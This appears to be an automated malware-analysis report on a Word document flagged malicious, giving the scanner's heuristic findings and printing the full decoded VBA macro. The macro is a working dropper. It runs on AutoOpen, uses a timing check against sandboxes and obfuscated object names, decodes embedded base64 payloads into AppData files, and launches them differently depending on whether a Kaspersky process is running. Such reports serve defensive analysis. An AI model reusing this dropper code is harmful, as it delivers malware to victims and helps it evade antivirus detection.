MALICIOUS
198
Risk Score
Heuristics 8
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell GetQuoteStart() & GetCommand(cvacjgzddhi) & GetQuoteEnd(), GetWindowStyle() -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set wsh = CreateObject("W" + _ -
CallByName call high OLE_VBA_CALLBYNAMECallByName callMatched line in script
result(0) = CallByName(UserForm1.Controls("C" + _ -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
GetAppDataPath = Environ("A" + _ -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9849 bytes |
SHA-256: b668c48209ab16730999177befd7506ab689b33ec599f351dcdaa4499ee707fc |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare PtrSafe Function WaitForSingleObject Lib "kernel32" (ByVal hHandle As LongPtr, ByVal dwMilliseconds As Long) As Long
Private Declare PtrSafe Function CreateToolhelp32Snapshot Lib "kernel32" (ByVal dwFlags As Long, ByVal th32ProcessID As Long) As Long
Private Declare PtrSafe Function Process32First Lib "kernel32" (ByVal hSnapshot As Long, ByRef lppe As PROCESSENTRY32) As Long
Private Declare PtrSafe Function Process32Next Lib "kernel32" (ByVal hSnapshot As Long, ByRef lppe As PROCESSENTRY32) As Long
Private Declare PtrSafe Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private Declare PtrSafe Function GetTickCount Lib "kernel32" () As Long
Private Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
Private Const TH32CS_SNAPPROCESS As Long = &H2
Private Const MAX_PATH As Long = 260
Private Type PROCESSENTRY32
dwSize As Long
cntUsage As Long
th32ProcessID As Long
th32DefaultHeapID As Long
th32ModuleID As Long
cntThreads As Long
th32ParentProcessID As Long
pcPriClassBase As Long
dwFlags As Long
szExeFile As String * MAX_PATH
End Type
Private Function CreateSnapShot() As Long
CreateSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0&)
End Function
Private Function GetExeFileName(procEntry As PROCESSENTRY32) As String
Dim nullPos As Long
nullPos = InStr(procEntry.szExeFile, Chr$(0))
If nullPos > 0 Then
GetExeFileName = Left$(procEntry.szExeFile, nullPos - 1)
Else
GetExeFileName = procEntry.szExeFile
End If
End Function
Function IPR(processName As String) As Boolean
Dim hSnapshot As Long
Dim procEntry As PROCESSENTRY32
Dim ret As Long
Dim currentName As String
IPR = False
hSnapshot = CreateSnapShot()
If hSnapshot = 0 Then Exit Function
procEntry.dwSize = Len(procEntry)
ret = Process32First(hSnapshot, procEntry)
Do While ret <> 0
currentName = GetExeFileName(procEntry)
If LCase(currentName) = LCase(processName) Then
IPR = True
Exit Do
End If
ret = Process32Next(hSnapshot, procEntry)
Loop
CloseHandle hSnapshot
End Function
Sub xvqkblk(programPath As String)
Dim wsh As Object
Set wsh = CreateObject("W" + _
"S" + _
"c" + _
"ri" + _
"p" + _
"t." + _
"S" + _
"h" + _
"el" + _
"l")
wsh.Run """" & programPath & """", 1, False
End Sub
Function fileExist(filePath)
Dim fso
Set fso = CreateObject("Sc" + _
"ri" + _
"pti" + _
"n" + _
"g.Fi" + _
"le" + _
"Sys" + _
"te" + _
"m" + _
"Obje" + _
"ct")
If fso.fileExists(filePath) Then
fileExist = True
Else
fileExist = False
End If
Set fso = Nothing
End Function
Sub ixkwkpzwa(cvacjgzddhi As String)
ExecuteShellCommand cvacjgzddhi
End Sub
Sub ExecuteShellCommand(cvacjgzddhi As String)
Shell GetQuoteStart() & GetCommand(cvacjgzddhi) & GetQuoteEnd(), GetWindowStyle()
End Sub
Function GetQuoteStart() As String
GetQuoteStart = Chr(34)
End Function
Function GetCommand(cvacjgzddhi As String) As String
GetCommand = cvacjgzddhi
End Function
Function GetQuoteEnd() As String
GetQuoteEnd = Chr(34)
End Function
Function GetWindowStyle() As Integer
GetWindowStyle = CalculateStyleValue()
End Function
Function CalculateStyleValue() As Integer
CalculateStyleValue = SubtractValues(10, 5)
End Function
Function SubtractValues(a As Integer, b As Integer) As Integer
SubtractValues = a - b
End Function
Private Function CleanInputString(s As String) As String
On Error Resume Next
CleanInputString = Replace(Replace(Replace(Replace(s, " ", ""), vbCr, ""), vbLf, ""), vbCrLf, "")
End Function
Private Function DB64I(cleanedStr As String) As Byte()
On Error Resume Next
Dim objNode As Object
Set objNode = CreateObject("M" + _
"SX" + _
"M" + _
"L2" + _
".DO" + _
"M" + _
"Do" + _
"cu" + _
"me" + _
"nt").createElement("b6" + _
"4")
With objNode
.DataType = "bi" + _
"n.b" + _
"as" + _
"e6" + _
"4"
.Text = cleanedStr
DB64I = .nodeTypedValue
End With
If Err.Number <> 0 Then DB64I = Split("")
End Function
Function bAd64(s As String) As Byte()
Dim cleanedStr As String
cleanedStr = CleanInputString(s)
bAd64 = DB64I(cleanedStr)
End Function
Private Function PrepareBuffer(buf As Variant) As Byte()
Dim i As Long
Dim tmp() As Byte
If VarType(buf) <> vbArray + vbByte Then
PrepareBuffer = Split("")
Exit Function
End If
ReDim tmp(LBound(buf) To UBound(buf))
For i = LBound(buf) To UBound(buf)
tmp(i) = buf(i)
Next i
PrepareBuffer = tmp
End Function
Private Function WBTD(FileName As String, staticBuf() As Byte) As Boolean
Dim fileNum As Integer
Dim i As Long
On Error GoTo ErrHandler
fileNum = FreeFile
Open FileName For Binary As #fileNum
For i = LBound(staticBuf) To UBound(staticBuf)
Put #fileNum, , staticBuf(i)
Next i
Close #fileNum
WBTD = True
Exit Function
ErrHandler:
WBTD = False
End Function
Function WrtBnfile(FileName As String, buf As Variant) As Boolean
Dim staticBuf() As Byte
staticBuf = PrepareBuffer(buf)
On Error Resume Next
If UBound(staticBuf) < LBound(staticBuf) Then
WrtBnfile = False
Exit Function
End If
On Error GoTo 0
WrtBnfile = WBTD(FileName, staticBuf)
End Function
Function vzexuqlaqfmxnd(path As String, conte As String)
hwminiArraXx = bAd64(conte)
WrtBnfile path, hwminiArraXx
End Function
Function GetAppDataPath() As String
GetAppDataPath = Environ("A" + _
"pp" + _
"D" + _
"at" + _
"a")
End Function
Function BuildDestPath1(appDataPath As String) As String
BuildDestPath1 = appDataPath & "\e" + _
"bo" + _
"ok-" + _
"e" + _
"d" + _
"it" + _
".e" + _
"xe"
End Function
Function BuildDestPath2(appDataPath As String) As String
BuildDestPath2 = appDataPath & "\C" + _
"Al" + _
"ibr" + _
"e" + _
"-LA" + _
"un" + _
"c" + _
"h" + _
"er.d" + _
"ll"
End Function
Function BuildDestPath3(appDataPath As String) As String
BuildDestPath3 = appDataPath & "\e" + _
"di" + _
"t2." + _
"h" + _
"lp"
End Function
Function GetFormContent() As String()
Dim result(2) As String
result(0) = CallByName(UserForm1.Controls("C" + _
"om" + _
"ma" + _
"n" + _
"d" + _
"But" + _
"t" + _
"on1"), "Ca" + _
"pt" + _
"i" + _
"on", VbGet)
result(1) = CallByName(UserForm2.Controls("Co" + _
"mma" + _
"nd" + _
"Bu" + _
"t" + _
"to" + _
"n" + _
"1"), "C" + _
"ap" + _
"t" + _
"io" + _
"n", VbGet)
result(2) = CallByName(UserForm3.Controls("Com" + _
"ma" + _
"ndBu" + _
"tt" + _
"on1"), "Ca" + _
"pti" + _
"on", VbGet)
GetFormContent = result
End Function
Sub CopyRequiredFiles(destPath1 As String, destPath2 As String, destPath3 As String, content() As String)
vzexuqlaqfmxnd destPath1, content(0)
vzexuqlaqfmxnd destPath2, content(1)
vzexuqlaqfmxnd destPath3, content(2)
End Sub
Sub CheckProcessAndRun(filePath As String)
If IPR("a" + _
"v" + _
"p" + _
"." + _
"e" + _
"x" + _
"e") Then
xvqkblk (filePath)
Else
ixkwkpzwa (filePath)
End If
End Sub
Public Function start()
Dim p1 As String, p2 As String, p3 As String
Dim tickBefore As Long
Dim tickAfter As Long
Dim elapsed As Long
tickBefore = GetTickCount()
Sleep 5000
tickAfter = GetTickCount()
If tickAfter >= tickBefore Then
elapsed = tickAfter - tickBefore
Else
elapsed = (&H7FFFFFFF - tickBefore) + tickAfter + 1
End If
If elapsed < 4000 Then Exit Function
Call PrepareLocalPaths(p1, p2, p3)
If Len(p1 & p2 & p3) < 6 Then Exit Function
Call EnsureResourcesExist(p1, p2, p3)
If Len(Dir(p1)) = 0 Then Exit Function
Call StartBackgroundService(p1)
End Function
Private Sub PrepareLocalPaths(ByRef outPath1 As String, _
ByRef outPath2 As String, _
ByRef outPath3 As String)
Dim baseDir As String
baseDir = GetAppDataPath()
outPath1 = BuildDestPath1(baseDir)
outPath2 = BuildDestPath2(baseDir)
outPath3 = BuildDestPath3(baseDir)
End Sub
Private Sub EnsureResourcesExist(ByVal inPath1 As String, _
ByVal inPath2 As String, _
ByVal inPath3 As String)
Dim rawData() As String
If fileExist(inPath1) Then Exit Sub
rawData = GetFormContent()
CopyRequiredFiles inPath1, inPath2, inPath3, rawData
End Sub
Private Sub StartBackgroundService(ByVal targetPath As String)
CheckProcessAndRun targetPath
End Sub
Sub AutoOpen()
start
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.